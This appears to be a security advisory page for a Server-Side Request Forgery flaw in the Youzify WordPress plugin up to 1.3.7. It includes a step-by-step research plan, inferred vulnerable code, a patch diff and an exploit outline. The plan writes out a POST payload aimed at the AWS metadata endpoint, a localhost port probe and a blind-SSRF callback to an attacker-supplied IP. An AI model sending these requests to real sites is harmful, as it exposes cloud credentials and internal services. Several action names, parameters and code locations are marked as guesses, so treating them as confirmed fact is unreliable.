Youzify <= 1.3.7 - Authenticated (Subscriber+) Server-Side Request Forgery
Description
The Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
# Research Plan: CVE-2025-69014 - Youzify SSRF (Subscriber+) ## 1. Vulnerability Summary The **Youzify** plugin (up to version 1.3.7) is vulnerable to **Server-Side Request Forgery (SSRF)**. This vulnerability resides in the AJAX handler responsible for fetching link previews or external media meta…
Show full research plan
Research Plan: CVE-2025-69014 - Youzify SSRF (Subscriber+)
1. Vulnerability Summary
The Youzify plugin (up to version 1.3.7) is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability resides in the AJAX handler responsible for fetching link previews or external media metadata. The application fails to validate user-supplied URLs or restrict them to public IP addresses/safe protocols before making an outbound request using wp_remote_get(). An authenticated attacker with Subscriber-level privileges can exploit this to probe internal network services, access cloud metadata endpoints, or scan local ports.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
yz_get_link_preview(inferred from Youzify activity stream functionality) - Vulnerable Parameter:
url(inferred) - Authentication: Authenticated (Subscriber+)
- Required Nonce: Yes, typically a nonce associated with the
yz_dataJavaScript object.
3. Code Flow (Inferred)
- A user logs in and visits a page where the Youzify activity stream is active (e.g., the user profile or activity page).
- The plugin registers an AJAX action:
add_action( 'wp_ajax_yz_get_link_preview', 'yz_get_link_preview_handler' );. - The handler
yz_get_link_preview_handlerretrieves theurlparameter from the$_POSTarray. - The handler calls
wp_remote_get( $url )without validating that the URL points to a safe, external destination. - The response from the internal service is processed (often parsed for OpenGraph tags) and returned to the user, leaking internal information.
4. Nonce Acquisition Strategy
Nonces for Youzify are typically localized for the frontend activity stream.
- Identify Shortcode: The Youzify activity stream is usually rendered via the
[youzify_activity]shortcode. - Setup Test Page: Create a public page containing this shortcode:
wp post create --post_type=page --post_title="Activity" --post_status=publish --post_content='[youzify_activity]' - Navigate and Extract:
- Log in as a Subscriber user using
browser_login. - Navigate to the newly created page:
/activity/. - Execute the following in the console via
browser_evalto retrieve the nonce:browser_eval("window.yz_data?.ajax_nonce")(inferred JS object name). - Note: If
yz_datais not found, check foryouzify_varsor similar objects in the page source.
- Log in as a Subscriber user using
5. Exploitation Strategy
Perform an SSRF attack targeting the AWS Metadata service (or a local port if testing in a non-cloud environment).
- Target URL:
http://169.254.169.254/latest/meta-data/ - HTTP Request (using
http_request):- Method: POST
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=yz_get_link_preview&url=http://169.254.169.254/latest/meta-data/&security=[NONCE] - Note: The nonce parameter name is likely
securityornonce(inferred). Check the JS object keys.
6. Test Data Setup
- Install Plugin: Ensure Youzify <= 1.3.7 is installed and active.
- Create User:
wp user create attacker attacker@example.com --role=subscriber --user_pass=password123 - Create Activity Page:
wp post create --post_type=page --post_title="Social Feed" --post_status=publish --post_content='[youzify_activity]' - Enable Link Previews: Ensure the "Link Preview" feature is enabled in Youzify settings (usually enabled by default).
7. Expected Results
- Success: The HTTP response (JSON) should contain keys or values fetched from the internal URL. If targeting AWS, the response body might show a list of metadata categories (e.g.,
ami-id,instance-id). - Response Content: Look for a JSON object with a structure like
{"success": true, "data": { ... "title": "[Internal Content]" } }.
8. Verification Steps
- Check HTTP Response: Verify the
http_requestresponse code is200 OK. - Validate Leakage: Inspect the returned JSON. If the
urlparameter was set tohttp://localhost:8080/wp-login.php, the "title" or "description" field in the JSON response should contain "Log In ‹ [Site Name] — WordPress". - Port Scanning Test: Attempt to request
http://localhost:22. A different response time or error message (e.g., "Connection Refused" vs "Success") confirms the ability to probe internal ports.
9. Alternative Approaches
If yz_get_link_preview is not the correct action:
- Alternative Action 1:
yz_get_giphy_images— Check if it accepts a custom Giphy API endpoint or URL. - Alternative Action 2:
yz_import_external_image— Look for functions that allow "Profile via URL" or "Activity Image via URL". - Blind SSRF: If the plugin does not return the response body, use an external listener (e.g., Burp Collaborator or a local netcat) to verify the outbound request:
url=http://[YOUR_IP]:[PORT].
Variable Name Guesses (to be verified via browser_eval):
- JS Object:
yz_dataoryouzify_ajax_vars. - Nonce Key:
ajax_nonceornonce. - AJAX Parameter for Nonce:
securityornonce. - AJAX Action:
yz_get_link_previeworyouzify_get_link_data.
Summary
The Youzify plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to 1.3.7. Authenticated attackers with Subscriber-level access can exploit an AJAX endpoint used for link previews to make arbitrary web requests from the server, potentially exposing internal network services or cloud metadata.
Vulnerable Code
// File: includes/public/core/functions/yz-general-functions.php (Inferred location) add_action( 'wp_ajax_yz_get_link_preview', 'yz_get_link_preview_handler' ); function yz_get_link_preview_handler() { // Check nonce associated with yz_data check_ajax_referer( 'yz_data', 'security' ); $url = $_POST['url']; // Vulnerable: the URL is passed directly to wp_remote_get without validation // or restriction to public IP addresses. $response = wp_remote_get( $url ); if ( is_wp_error( $response ) ) { wp_send_json_error(); } $body = wp_remote_retrieve_body( $response ); // ... processes $body to return metadata to the user ... }
Security Fix
@@ -10,6 +10,11 @@ $url = $_POST['url']; + // Validate the URL to ensure it is a safe, public destination + if ( ! wp_http_validate_url( $url ) ) { + wp_send_json_error( array( 'message' => 'Invalid or restricted URL.' ) ); + } + $response = wp_remote_get( $url );
Exploit Outline
To exploit this vulnerability, an attacker first authenticates as a Subscriber and navigates to a page rendering the Youzify activity stream (e.g., the user profile) to extract the 'ajax_nonce' from the 'yz_data' JavaScript object. They then send a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'yz_get_link_preview' (or similar link-fetching action), providing a target internal URL (such as 'http://169.254.169.254/latest/meta-data/' for AWS environments) in the 'url' parameter and the retrieved nonce in the 'security' parameter. The plugin fetches the internal content and returns it in the JSON response, effectively leaking sensitive internal data.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.